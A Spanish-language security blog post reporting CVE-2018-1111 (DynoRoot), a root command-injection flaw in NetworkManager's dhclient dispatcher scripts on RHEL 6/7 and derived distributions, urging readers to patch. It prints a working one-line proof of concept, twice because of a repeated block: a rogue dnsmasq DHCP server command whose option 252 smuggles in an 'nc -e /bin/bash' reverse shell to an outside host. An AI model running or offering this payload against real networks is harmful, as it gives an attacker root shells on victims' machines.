Felix Wilhelm, un investigador de Google, descubrió recientemente una vulnerabilidad crítica en un script incluido en los paquetes del cliente DHCP (dhclient) en Red Hat Enterprise Linux 6 y 7 (y distribuciones derivadas). La vulnerabilidad, etiquetada con el CVE-2018-1111 y bautizada también como DynoRoot, podría permitir a un atacante ejecutar comandos arbitrarios con privilegios de root en los sistemas afectados.
Los scripts en concreto son los del componente NetworkManager /etc/NetworkManager/dispatcher.d/11-dhclient (en RHEL 7) y /etc/NetworkManager/dispatcher.d/10-dhclient (en RHEL 6), que se ejecutan cada vez que NetworkManager recibe una respuesta DHCP de un servidor DHCP. Y lo peor (o lo mejor según se mire) el PoC de su explotación cabe hasta en un tweet:
https://twitter.com/Barknkilic/status/996470756283486209
dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #"
Podéis imaginar que un servidor DHCP malicioso, o un atacante en la red local capaz de falsificar respuestas DHCP, podría usar este bug para ejecutar comandos arbitrarios con privilegios de root en los sistemas que usan NetworkManager para obtener la configuración de red utilizando el protocolo DHCP.
De momento, a parte de RHEL 6.x y 7x, se han confirmado como vulnerables CentOS 6.x y 7.x, Fedora 26, 27, 28, Rawhide e incluso los sistemas ClearOS y Oracle Linux de HPE y el reciente Korora Linux.
¡Hora de parchear!
Fuente: https://access.redhat.com/security/vulnerabilities/3442151
Los scripts en concreto son los del componente NetworkManager /etc/NetworkManager/dispatcher.d/11-dhclient (en RHEL 7) y /etc/NetworkManager/dispatcher.d/10-dhclient (en RHEL 6), que se ejecutan cada vez que NetworkManager recibe una respuesta DHCP de un servidor DHCP. Y lo peor (o lo mejor según se mire) el PoC de su explotación cabe hasta en un tweet:
https://twitter.com/Barknkilic/status/996470756283486209
dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #"
Podéis imaginar que un servidor DHCP malicioso, o un atacante en la red local capaz de falsificar respuestas DHCP, podría usar este bug para ejecutar comandos arbitrarios con privilegios de root en los sistemas que usan NetworkManager para obtener la configuración de red utilizando el protocolo DHCP.
De momento, a parte de RHEL 6.x y 7x, se han confirmado como vulnerables CentOS 6.x y 7.x, Fedora 26, 27, 28, Rawhide e incluso los sistemas ClearOS y Oracle Linux de HPE y el reciente Korora Linux.
¡Hora de parchear!
Fuente: https://access.redhat.com/security/vulnerabilities/3442151
Comentarios
Publicar un comentario